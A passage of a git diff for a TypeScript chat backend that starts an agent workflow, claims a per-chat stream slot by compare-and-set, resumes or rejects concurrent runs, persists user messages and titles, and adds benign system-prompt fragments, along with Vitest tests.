+    expect(result.action).toBe("resume");
+  });
+
+  it("returns action=ready after CASing a completed run's stale id to null", async () => {
+    mockRun("completed");
+    vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: true });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("ready");
+    expect(compareAndSetChatActiveStreamId).toHaveBeenCalledWith(CHAT_ID, RUN_ID, null);
+  });
+
+  it("returns action=conflict when getRun throws (transient workflow API error)", async () => {
+    vi.mocked(getRun).mockImplementation(() => {
+      throw new Error("workflow API unreachable");
+    });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("conflict");
+    // Critical: we do NOT clear the stream id on transient error.
+    expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled();
+  });
+
+  it("returns action=conflict when status promise rejects", async () => {
+    // Wrap in a thenable that defers the rejection so Vitest's
+    // unhandled-rejection watcher doesn't flag it before the code awaits.
+    const rejection: Promise<string> = (async () => {
+      throw new Error("status fetch failed");
+    })();
+    rejection.catch(() => {
+      /* attach a handler so it's not 'unhandled' before the SUT awaits */
+    });
+    vi.mocked(getRun).mockReturnValue({
+      status: rejection,
+      getReadable: () => new ReadableStream(),
+    } as never);
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("conflict");
+    expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled();
+  });
+
+  it("returns action=conflict when CAS-clear loses the race (claimed=false)", async () => {
+    mockRun("completed");
+    vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: false });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("conflict");
+  });
+
+  it("returns action=conflict when CAS-clear hits a DB error (ok:false)", async () => {
+    mockRun("completed");
+    vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: false, error: "down" });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    // P1 fix: a failed re-read after CAS no longer falls through to "ready".
+    expect(result.action).toBe("conflict");
+  });
+});
diff --git a/lib/chat/agentCustomInstructions.ts b/lib/chat/agentCustomInstructions.ts
new file mode 100644
index 000000000..0a3191ea7
--- /dev/null
+++ b/lib/chat/agentCustomInstructions.ts
@@ -0,0 +1,9 @@
+import { assistantFileLinkPrompt } from "@/lib/chat/assistantFileLinks";
+import { recoupApiSkillPrompt } from "@/lib/chat/recoupApiSkillPrompt";
+
+/**
+ * Platform-wide agent instructions appended on every chat-workflow prompt.
+ * Combines individual prompt fragments here so the route and tests share one
+ * source of truth instead of re-joining the same strings in each place.
+ */
+export const agentCustomInstructions = [assistantFileLinkPrompt, recoupApiSkillPrompt].join("\n\n");
diff --git a/lib/chat/assistantFileLinks.ts b/lib/chat/assistantFileLinks.ts
new file mode 100644
index 000000000..b5bd9280f
--- /dev/null
+++ b/lib/chat/assistantFileLinks.ts
@@ -0,0 +1,28 @@
+const WORKSPACE_FILE_HREF_PREFIX = "#workspace-file=";
+
+function normalizeWorkspaceFilePath(filePath: string): string {
+  return filePath.replaceAll("\\", "/").trim();
+}
+
+/**
+ * Build the in-app deep link the chat UI uses to open a workspace file.
+ *
+ * @param filePath - Repo-relative file path (e.g. `src/index.ts`).
+ * @returns Href fragment prefixed with `#workspace-file=`.
+ */
+export function buildWorkspaceFileHref(filePath: string): string {
+  return `${WORKSPACE_FILE_HREF_PREFIX}${normalizeWorkspaceFilePath(filePath)}`;
+}
+
+/**
+ * System prompt fragment telling the assistant how to render workspace
+ * file paths as clickable links inside chat messages.
+ */
+export const assistantFileLinkPrompt = [
+  "When you mention a workspace file path in assistant text, render it as a markdown link using this exact format:",
+  `- \`[path/to/file.ts](${buildWorkspaceFileHref("path/to/file.ts")})\``,
+  "- Use the repo-relative file path as both the visible link text and the path inside the link.",
+  "- Whole-file links only for now. Do not include line numbers or ranges.",
+  "- Do not use this format for URLs or anything that is not a real workspace file path.",
+  "- If you are not sure of the exact file path, do not invent one.",
+].join("\n");
diff --git a/lib/chat/compareAndSetChatActiveStreamId.ts b/lib/chat/compareAndSetChatActiveStreamId.ts
new file mode 100644
index 000000000..b3b218245
--- /dev/null
+++ b/lib/chat/compareAndSetChatActiveStreamId.ts
@@ -0,0 +1,49 @@
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+/**
+ * Result of the CAS attempt. Forces callers to distinguish:
+ *
+ *   - `{ ok: true, claimed: true }` — the row matched the expected value and
+ *     was updated to `next`.
+ *   - `{ ok: true, claimed: false }` — predicate didn't match (a race was
+ *     lost OR the row's `active_stream_id` is in some other state).
+ *   - `{ ok: false, error }` — Supabase / network failure. Distinct from
+ *     "race lost" so callers don't return a misleading 409 when the DB is
+ *     actually unhealthy.
+ */
+export type CasChatActiveStreamIdResult =
+  | { ok: true; claimed: boolean }
+  | { ok: false; error: string };
+
+/**
+ * Atomically swap `chats.active_stream_id` from `expected` to `next` for
+ * the given chat. Domain wrapper over the generic `updateChat` helper —
+ * keeps the CAS-on-active_stream_id concept here (in the chat domain)
+ * rather than in the Supabase plumbing.
+ *
+ * Used by `/api/chat/workflow` to:
+ *   - Claim the slot before `start(workflow)` (`expected: null`, `next: "pending-<uuid>"`).
+ *   - Promote the placeholder to the real run id after start.
+ *   - Release a stale slot in `reconcileExistingActiveStream`.
+ *
+ * @param chatId - Target chat id.
+ * @param expected - The value `active_stream_id` must currently hold (null to
+ *   require an unset slot).
+ * @param next - The value to write (null to release the slot).
+ */
+export async function compareAndSetChatActiveStreamId(
+  chatId: string,
+  expected: string | null,
+  next: string | null,
+): Promise<CasChatActiveStreamIdResult> {
+  const result = await updateChat(
+    { id: chatId, where: { active_stream_id: expected } },
+    { active_stream_id: next },
+  );
+
+  if ("error" in result) {
+    return { ok: false, error: result.error };
+  }
+
+  return { ok: true, claimed: result.rowsUpdated > 0 };
+}
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index 137f699cb..dcaad8585 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -1,31 +1,56 @@
 import { NextRequest, NextResponse } from "next/server";
-import { createUIMessageStream, createUIMessageStreamResponse } from "ai";
+import { createUIMessageStreamResponse, type UIMessageChunk } from "ai";
+import { start, getRun } from "workflow/api";
 import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream";
 import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
 import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
 import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { buildActiveLifecycleUpdate } from "@/lib/sandbox/buildActiveLifecycleUpdate";
+import { updateSession } from "@/lib/supabase/sessions/updateSession";
+import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
 import { errorResponse } from "@/lib/networking/errorResponse";
 import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
 import generateUUID from "@/lib/uuid/generateUUID";
 
+const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
+
 /**
  * Handles POST /api/chat/workflow.
  *
- * Stub implementation: delegates auth + body validation to validateChatWorkflow,
- * verifies ownership of the referenced session + chat, confirms the session's
- * sandbox is active, then returns a hardcoded UIMessage stream with an
- * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive
- * the agent loop is wired up in a follow-up PR — this stub exists so clients
- * can integrate against the contract documented at
- * /api-reference/chat/workflow.
+ * Wires the chat UI to a durable Vercel Workflow agent loop. Flow:
+ *
+ *   1. Validate auth + body (validateChatWorkflow).
+ *   2. Verify session + chat ownership; ensure the session has an active sandbox.
+ *   3. If a workflow is already running for this chat, resume / 409 via
+ *      maybeResumeChatStream (extracted for OCP).
+ *   4. **Claim `chats.active_stream_id` BEFORE starting the workflow** using
+ *      a `pending-<uuid>` placeholder CAS. Closes the race window where two
+ *      concurrent requests could both call `start()` and bill the model
+ *      before one loses the CAS.
+ *   5. Refresh the session's lifecycle-activity timestamp + fire-and-forget
+ *      persist the latest user message.
+ *   6. start(runAgentWorkflow). Replace the placeholder with the real run id
+ *      (we already own the slot, no CAS needed).
+ *   7. Return the workflow's UIMessage stream with x-workflow-run-id header.
+ *
+ * If we lost the placeholder CAS in step 4, the slot is already held by
+ * another in-flight or pending request → 409 (no workflow was started, so
+ * nothing to cancel).
  *
- * @param request - The incoming NextRequest
- * @returns A streaming Response (200) or a NextResponse error.
+ * Tools/sandbox passing is intentionally not wired here yet — the follow-up
+ * PR ports the @open-harness/agent tool surface into api.
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A streaming 200 Response or a NextResponse error.
  */
 export async function handleChatWorkflowStream(request: NextRequest): Promise<Response> {
   const validated = await validateChatWorkflow(request);
   if (validated instanceof NextResponse) return validated;
 
+  // Session + ownership + sandbox active
   const sessions = await selectSessions({ id: validated.sessionId });
   if (sessions === null) return errorResponse("Internal server error", 500);
   const session = sessions[0];
@@ -33,29 +58,56 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403);
   if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400);
 
+  // Chat + ownership
   const chats = await selectChats({ id: validated.chatId });
   const chat = chats[0];
   if (!chat || chat.session_id !== validated.sessionId) {
     return errorResponse("Chat not found", 404);
   }
 
-  const runId = `stub-${generateUUID()}`;
+  // Resume an in-flight workflow for this chat (or 409) before starting a new one.
+  const resumed = await maybeResumeChatStream(validated.chatId, chat.active_stream_id);
+  if (resumed) return resumed;
+
+  // Pre-claim the active_stream_id slot with a placeholder BEFORE starting
+  // the workflow. This closes the race where two requests both call start()
+  // and bill the model before one loses the CAS.
+  const placeholder = `pending-${generateUUID()}`;
+  const claimed = await compareAndSetChatActiveStreamId(validated.chatId, null, placeholder);
+  if (!claimed.ok) return errorResponse("Internal server error", 500);
+  if (!claimed.claimed) {
+    return errorResponse("Another workflow is already running for this chat", 409);
+  }
 
-  const stream = createUIMessageStream({
-    generateId: generateUUID,
-    execute: ({ writer }) => {
-      const id = generateUUID();
-      writer.write({ type: "text-start", id });
-      writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" });
-      writer.write({ type: "text-end", id });
+  // We own the slot — safe to start the workflow.
+  await updateSession(validated.sessionId, buildActiveLifecycleUpdate(session.sandbox_state));
+  void persistLatestUserMessage(validated.chatId, validated.messages as never);
+
+  const modelId = chat.model_id ?? DEFAULT_MODEL_ID;
+  const run = await start(runAgentWorkflow, [
+    {
+      messages: validated.messages,
+      chatId: validated.chatId,
+      sessionId: validated.sessionId,
+      modelId,
     },
-  });
+  ]);
+
+  // Promote placeholder → real run id via CAS. If something asynchronously
+  // stole the slot (or the DB went down) we cancel the workflow we just
+  // started since another stream now owns the client.
+  const promoted = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, run.runId);
+  if (!promoted.ok || !promoted.claimed) {
+    try {
+      await getRun(run.runId).cancel();
+    } catch (error) {
+      console.error("[handleChatWorkflowStream] cancel after slot-loss failed:", error);
+    }
+    return errorResponse("Another workflow is already running for this chat", 409);
+  }
 
   return createUIMessageStreamResponse({
-    stream,
-    headers: {
-      ...getCorsHeaders(),
-      "x-workflow-run-id": runId,
-    },
+    stream: run.getReadable<UIMessageChunk>(),
+    headers: { ...getCorsHeaders(), "x-workflow-run-id": run.runId },
   });
 }
diff --git a/lib/chat/maybeResumeChatStream.ts b/lib/chat/maybeResumeChatStream.ts
new file mode 100644
index 000000000..209113fbf
--- /dev/null
+++ b/lib/chat/maybeResumeChatStream.ts
@@ -0,0 +1,40 @@
+import { createUIMessageStreamResponse, type UIMessageChunk } from "ai";
+import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+
+/**
+ * Encapsulates the "is there already a workflow for this chat?" branch of
+ * the POST /api/chat/workflow handler.
+ *
+ *   - If `activeStreamId` is unset → returns `null`; handler proceeds with
+ *     a fresh workflow.
+ *   - If a workflow is alive → returns a streaming `Response` that pipes
+ *     the existing run's readable back to the client.
+ *   - If the slot is held by a dead/transient/raced run → returns a 409
+ *     `Response`.
+ *
+ * Extracted from the handler so the orchestration stays small and the
+ * resume-vs-conflict logic can grow independently.
+ */
+export async function maybeResumeChatStream(
+  chatId: string,
+  activeStreamId: string | null,
+): Promise<Response | null> {
+  if (!activeStreamId) return null;
+
+  const reconciled = await reconcileExistingActiveStream(chatId, activeStreamId);
+
+  if (reconciled.action === "resume") {
+    return createUIMessageStreamResponse({
+      stream: reconciled.stream as ReadableStream<UIMessageChunk>,
+      headers: { ...getCorsHeaders(), "x-workflow-run-id": reconciled.runId },
+    });
+  }
+
+  if (reconciled.action === "conflict") {
+    return errorResponse("Another workflow is already running for this chat", 409);
+  }
+
+  return null; // action: "ready" — caller starts a new workflow.
+}
diff --git a/lib/chat/persistLatestUserMessage.ts b/lib/chat/persistLatestUserMessage.ts
new file mode 100644
index 000000000..73c06f5ef
--- /dev/null
+++ b/lib/chat/persistLatestUserMessage.ts
@@ -0,0 +1,84 @@
+import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage";
+import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+type TextPart = { type: "text"; text: string };
+type UserMessage = { id: string; role: string; parts: Array<TextPart | { type: string }> };
+
+const TITLE_MAX_LENGTH = 80;
+const TRUNCATION_SUFFIX = "…";
+const TITLE_BODY_BUDGET = TITLE_MAX_LENGTH - TRUNCATION_SUFFIX.length;
+
+/**
+ * Fire-and-forget persistence of the latest user message in a chat-workflow
+ * request. Called before `start(runAgentWorkflow, ...)` so that:
+ *
+ *   - A page refresh during workflow queue time still shows the user message.
+ *   - The chat's `updated_at` reflects activity even if the workflow hasn't
+ *     produced its first chunk yet.
+ *   - The chat title is set from the first user message (capped at 80 chars
+ *     including the truncation suffix, addressing the prior off-by-3 bug).
+ *
+ * Title-eligibility uses "earliest message in the chat", not "only message",
+ * so a fast-following second message can't race past the title-set.
+ *
+ * All failures are caught and logged — this MUST NOT block the request path.
+ *
+ * @param chatId - The target chat.
+ * @param messages - The full message list from the request body.
+ */
+export async function persistLatestUserMessage(
+  chatId: string,
+  messages: UserMessage[],
+): Promise<void> {
+  try {
+    const latest = messages[messages.length - 1];
+    if (!latest || latest.role !== "user") return;
+
+    const inserted = await upsertChatMessage({
+      id: latest.id,
+      chat_id: chatId,
+      role: "user",
+      parts: latest as never,
+    });
+
+    // Bail on DB errors (already logged). Don't touch the chat or set a title
+    // since we can't confirm the message landed.
+    if (!inserted.ok) return;
+
+    // If it was a duplicate, the original insert already drove side effects.
+    if (inserted.isDuplicate || inserted.row === null) return;
+
+    await updateChat({ id: chatId }, { updated_at: new Date().toISOString() });
+
+    // Title-set is gated on "is this row still the earliest message in the chat?"
+    // — a fast follow-up message that landed before this query wouldn't shift
+    // the earliest row's id, so we'd still title from this message correctly,
+    // and racing in the opposite direction (this message landed second) gives
+    // us a different id at position 0 and we correctly skip.
+    const earliest = await selectChatMessages({
+      chatId,
+      orderBy: { createdAt: "asc" },
+      limit: 1,
+    });
+
+    // DB-error or no rows — bail without titling.
+    if (!earliest || earliest.length === 0) return;
+    if (earliest[0]?.id !== inserted.row.id) return;
+
+    const text = latest.parts
+      .filter((part): part is TextPart => part.type === "text")
+      .map(part => part.text)
+      .join(" ")
+      .trim();
+    if (text.length === 0) return;
+
+    const title =
+      text.length > TITLE_MAX_LENGTH
+        ? `${text.slice(0, TITLE_BODY_BUDGET)}${TRUNCATION_SUFFIX}`
+        : text;
+    await updateChat({ id: chatId }, { title });
+  } catch (error) {
+    console.error("[persistLatestUserMessage] error:", error);
+  }
+}
diff --git a/lib/chat/reconcileExistingActiveStream.ts b/lib/chat/reconcileExistingActiveStream.ts
new file mode 100644
index 000000000..4ab004493
--- /dev/null
+++ b/lib/chat/reconcileExistingActiveStream.ts
@@ -0,0 +1,56 @@
+import { getRun } from "workflow/api";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+
+export type ReconcileResult =
+  | { action: "resume"; runId: string; stream: ReadableStream<unknown> }
+  | { action: "ready" }
+  | { action: "conflict" };
+
+const RUNNING_STATUSES = new Set(["running", "pending"]);
+
+/**
+ * Resolves what to do when `chats.active_stream_id` is already set at the
+ * start of a new chat-workflow request.
+ *
+ *   - If the referenced workflow run is alive (`running` | `pending`) →
+ *     `action: "resume"` with the existing readable. Caller pipes it back to
+ *     the client.
+ *   - If the run is terminally done AND we win the CAS to clear the stale id
+ *     → `action: "ready"`. Caller starts a fresh workflow.
+ *   - **Anything else** (workflow API throws, CAS-clear loses the race, CAS
+ *     reports a DB error) → `action: "conflict"`. Surfaces as 409 upstream.
+ *
+ * Safer-than-open-agents error semantics: a transient `workflow/api` failure
+ * does NOT clear the stale stream id (which previously created a window for
+ * duplicate runs). When we can't confidently say "this stream is dead", we
+ * refuse to start a new one. Eventually the real run completes, a subsequent
+ * request observes that, clears the slot, and unblocks.
+ */
+export async function reconcileExistingActiveStream(
+  chatId: string,
+  activeStreamId: string,
+): Promise<ReconcileResult> {
+  // Probe the workflow status. Any thrown error here is treated as transient —
+  // we keep the slot held rather than risk starting a duplicate run.
+  let status: string;
+  try {
+    const existingRun = getRun(activeStreamId);
+    status = await existingRun.status;
+    if (RUNNING_STATUSES.has(status)) {
+      return { action: "resume", runId: activeStreamId, stream: existingRun.getReadable() };
+    }
+  } catch (error) {
+    console.error("[reconcileExistingActiveStream] getRun failed; treating as conflict:", error);
+    return { action: "conflict" };
+  }
+
+  // Run is terminally done. Attempt to clear the stale id via CAS. If we
+  // win → ready. Anything else (race lost OR DB error) → conflict, so we
+  // never accidentally start a duplicate workflow on the back of a failed
+  // read.
+  const cleared = await compareAndSetChatActiveStreamId(chatId, activeStreamId, null);
+  if (cleared.ok && cleared.claimed) {
+    return { action: "ready" };
+  }
+  return { action: "conflict" };
+}
diff --git a/lib/chat/recoupApiSkillPrompt.ts b/lib/chat/recoupApiSkillPrompt.ts
new file mode 100644
index 000000000..93f4d2e39
--- /dev/null
+++ b/lib/chat/recoupApiSkillPrompt.ts
@@ -0,0 +1,11 @@
+/**
+ * Always-on nudge appended to the agent's system instructions. Points
+ * at the `recoup-api` and `artist-workspace` skills so prompts about
+ * anything owned by the user's Recoup account reliably load the right
+ * playbook — either the filesystem (for sandbox inventory and create-
+ * artist scaffolding) or the API (for live data) — instead of the
+ * agent guessing endpoint paths or interpreting overloaded nouns like
+ * "tasks" as generic repo TODOs.
+ */
+export const recoupApiSkillPrompt =
+  'If you\'re asked about anything belonging to their Recoup account — artists, socials, orgs, research, tasks, chats, pulses, notifications, subscriptions, or any other resource visible at recoup-api.vercel.app / developers.recoupable.com — pick the right skill first instead of guessing. For inventory questions about this sandbox ("what artists / orgs do I have", "list my artists", "what\'s in here") load `artist-workspace` — the `artists/{artist-slug}/RECOUP.md` tree is authoritative for this sandbox (the sandbox is already org-scoped — its repo IS the org — so artists live at the top level, not under an `orgs/` directory) and the API is not. For create-artist intents ("create artist", "onboard X", "add an artist", "set up a new artist") also load `artist-workspace` first — it scaffolds the artist\'s `RECOUP.md` as a checklist file you tick off step-by-step, which is what keeps the 8-step chain from dropping steps when run from a sandbox; the curl-by-curl reference for each step lives via `recoup-api` (developers.recoupable.com/workflows/create-artist), but the checklist file is the source of truth for what\'s done. For live data (socials, posts, metrics, research, tasks, notifications) or anything not in the tree, load `recoup-api` — and when `RECOUP_ORG_ID` is set in the env, scope list endpoints to that org (`/api/organizations/$RECOUP_ORG_ID/...`, `--org $RECOUP_ORG_ID` on the CLI) so you get results for the sandbox\'s org, not every org the user belongs to. Treat ambiguous account-data questions as Recoup questions by default, not repo-level TODOs.';
diff --git a/lib/recoupable/__tests__/extractOrgId.test.ts b/lib/recoupable/__tests__/extractOrgId.test.ts
new file mode 100644
index 000000000..c38232c4c
--- /dev/null
+++ b/lib/recoupable/__tests__/extractOrgId.test.ts
@@ -0,0 +1,57 @@
+import { describe, it, expect } from "vitest";
+import { extractOrgId } from "@/lib/recoupable/extractOrgId";
+
+describe("extractOrgId", () => {
+  it("extracts the UUID tail from a full clone URL", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/recoupable/org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a",
+      ),
+    ).toBe("cebcc866-34c3-451c-8cd7-f63309acff0a");
+  });
+
+  it("strips a .git suffix before extracting", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6.git",
+      ),
+    ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6");
+  });
+
+  it("tolerates a trailing slash on the URL", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6/",
+      ),
+    ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6");
+  });
+
+  it("accepts an already-extracted repo name", () => {
+    expect(extractOrgId("org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a")).toBe(
+      "cebcc866-34c3-451c-8cd7-f63309acff0a",
+    );
+  });
+
+  it("lowercases an uppercase UUID", () => {
+    expect(extractOrgId("org-myco-wtf-80263819-9DFD-4BBF-9371-60A6185122D6")).toBe(
+      "80263819-9dfd-4bbf-9371-60a6185122d6",
+    );
+  });
+
+  it("returns null for non-Recoupable clone URLs", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/someone-else/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6",
+      ),
+    ).toBeNull();
+  });
+
+  it("returns null when the repo name has no UUID tail", () => {
+    expect(extractOrgId("org-rostrum-pacific")).toBeNull();
+  });
+
+  it("returns null for malformed strings", () => {
+    expect(extractOrgId("")).toBeNull();
+    expect(extractOrgId("not-a-url-or-repo")).toBeNull();
+  });
+});
diff --git a/lib/recoupable/extractOrgId.ts b/lib/recoupable/extractOrgId.ts
new file mode 100644
index 000000000..ac30985c5
--- /dev/null
+++ b/lib/recoupable/extractOrgId.ts
@@ -0,0 +1,31 @@
+import { extractOrgRepoName } from "@/lib/recoupable/extractOrgRepoName";
+
+const UUID_TAIL_PATTERN = /-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i;
+
+/**
+ * Extracts the organization UUID from a Recoupable org clone URL or
+ * repo name. Recoupable orgs follow the convention `org-<slug>-<uuid-v4>`
+ * in their GitHub repo names, so the UUID is always the trailing 36 chars.
+ *
+ * Used by the chat workflow handler to derive `recoupOrgId` from the
+ * session's clone URL — the `recoup-api` skill scopes calls to this org
+ * so sandbox agents see results for the sandbox's org rather than every
+ * org the user belongs to.
+ *
+ * @param cloneUrlOrRepoName - Either the full clone URL
+ *   (`https://github.com/recoupable/org-foo-<uuid>`) or the already-extracted
+ *   repo name (`org-foo-<uuid>`).
+ * @returns The lowercased UUID, or `null` for anything that doesn't match.
+ */
+export function extractOrgId(cloneUrlOrRepoName: string): string | null {
+  const repoName = cloneUrlOrRepoName.startsWith("http")
+    ? extractOrgRepoName(cloneUrlOrRepoName)
+    : cloneUrlOrRepoName;
+
+  if (!repoName) {
+    return null;
+  }
+
+  const match = repoName.match(UUID_TAIL_PATTERN);
+  return match?.[1]?.toLowerCase() ?? null;
+}
diff --git a/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
new file mode 100644
index 000000000..c973f24df
--- /dev/null
+++ b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
@@ -0,0 +1,58 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages";
+
+const selectChain = vi.fn();
+const eqChain = vi.fn();
+const orderChain = vi.fn();
+const limitChain = vi.fn();
+
+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ select: selectChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Allow any number of chained .eq() / .order() / .limit() calls — they all
+  // return the same fluent builder.
+  const builder = { eq: eqChain, order: orderChain, limit: limitChain };
+  selectChain.mockReturnValue(builder);
+  eqChain.mockReturnValue(builder);
+  orderChain.mockReturnValue(builder);
+  limitChain.mockReturnValue(builder);
+});
+
+describe("selectChatMessages", () => {
+  it("returns rows on success", async () => {
+    limitChain.mockResolvedValue({ data: [{ id: "m-1" }], error: null });
+    const result = await selectChatMessages({
+      chatId: "c-1",
+      orderBy: { createdAt: "asc" },
+      limit: 1,
+    });
+    expect(result).toEqual([{ id: "m-1" }]);
+    expect(eqChain).toHaveBeenCalledWith("chat_id", "c-1");
+    expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: true });
+    expect(limitChain).toHaveBeenCalledWith(1);
+  });
+
+  it("returns null on Supabase error (so callers can distinguish from empty)", async () => {
+    // With no filters, the terminal call is on selectChain itself
+    selectChain.mockResolvedValue({ data: null, error: { message: "down" } });
+    const result = await selectChatMessages({});
+    expect(result).toBeNull();
+  });
+
+  it("returns [] on no match", async () => {
+    limitChain.mockResolvedValue({ data: [], error: null });
+    const result = await selectChatMessages({ chatId: "c-1", limit: 1 });
+    expect(result).toEqual([]);
+  });
+
+  it("applies desc ordering when requested", async () => {
+    limitChain.mockResolvedValue({ data: [], error: null });
+    await selectChatMessages({ chatId: "c-1", orderBy: { createdAt: "desc" }, limit: 1 });
+    expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: false });
+  });
+});
diff --git a/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
new file mode 100644
index 000000000..0ea559058
--- /dev/null
+++ b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
@@ -0,0 +1,46 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage";
+
+const upsertChain = vi.fn();
+const selectChain = vi.fn();
+const maybeSingleChain = vi.fn();
+
+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ upsert: upsertChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  upsertChain.mockReturnValue({ select: selectChain });
+  selectChain.mockReturnValue({ maybeSingle: maybeSingleChain });
+});
+
+const data = {
+  id: "msg-1",
+  chat_id: "chat-1",
+  role: "user" as const,
+  parts: [{ type: "text", text: "hi" }],
+};
+
+describe("upsertChatMessage", () => {
+  it("returns ok:true with the row and isDuplicate:false on new insert", async () => {
+    maybeSingleChain.mockResolvedValue({ data, error: null });
+    const result = await upsertChatMessage(data);
+    expect(result).toEqual({ ok: true, row: data, isDuplicate: false });
+    expect(upsertChain).toHaveBeenCalledWith(data, { onConflict: "id", ignoreDuplicates: true });
+  });
+
+  it("returns ok:true with isDuplicate:true when the id already existed", async () => {
+    maybeSingleChain.mockResolvedValue({ data: null, error: null });
+    const result = await upsertChatMessage(data);
+    expect(result).toEqual({ ok: true, row: null, isDuplicate: true });
+  });
+
+  it("returns ok:false with error on Supabase failure (distinct from duplicate)", async () => {
+    maybeSingleChain.mockResolvedValue({ data: null, error: { message: "down" } });
+    const result = await upsertChatMessage(data);
+    expect(result).toEqual({ ok: false, error: "down" });
+  });
+});
diff --git a/lib/supabase/chat_messages/selectChatMessages.ts b/lib/supabase/chat_messages/selectChatMessages.ts
new file mode 100644
index 000000000..ff2ceae24
--- /dev/null
+++ b/lib/supabase/chat_messages/selectChatMessages.ts
@@ -0,0 +1,40 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables } from "@/types/database.types";
+
+export type SelectChatMessagesFilter = {
+  id?: string;
+  chatId?: string;
+  /** Order by `created_at` direction. Defaults to ascending (oldest first). */
+  orderBy?: { createdAt: "asc" | "desc" };
+  /** Maximum rows to return. Omit for no limit. */
+  limit?: number;
+};
+
+/**
+ * Generic `chat_messages` reader mirroring the `selectChats` / `selectSessions`
+ * pattern. Returns rows on success, `[]` on no match, or `null` on Supabase
+ * error so callers can distinguish "nothing here" from "DB unreachable".
+ *
+ * Domain-specific questions ("is this the first message in the chat?") live
+ * in wrapper helpers under `lib/chat/` — keep this file focused on the
+ * read primitive.
+ */
+export async function selectChatMessages(
+  filter: SelectChatMessagesFilter = {},
+): Promise<Tables<"chat_messages">[] | null> {
+  let query = supabase.from("chat_messages").select("*");
+  if (filter.id) query = query.eq("id", filter.id);
+  if (filter.chatId) query = query.eq("chat_id", filter.chatId);
+  if (filter.orderBy) {
+    query = query.order("created_at", { ascending: filter.orderBy.createdAt === "asc" });
+    query = query.order("id", { ascending: true });
+  }
+  if (filter.limit !== undefined) query = query.limit(filter.limit);
+
+  const { data, error } = await query;
+  if (error) {
+    console.error("[selectChatMessages] error:", error);
+    return null;
+  }
+  return data ?? [];
+}
diff --git a/lib/supabase/chat_messages/upsertChatMessage.ts b/lib/supabase/chat_messages/upsertChatMessage.ts
new file mode 100644
index 000000000..d98b9b343
--- /dev/null
+++ b/lib/supabase/chat_messages/upsertChatMessage.ts
@@ -0,0 +1,37 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables, TablesInsert } from "@/types/database.types";
+
+/**
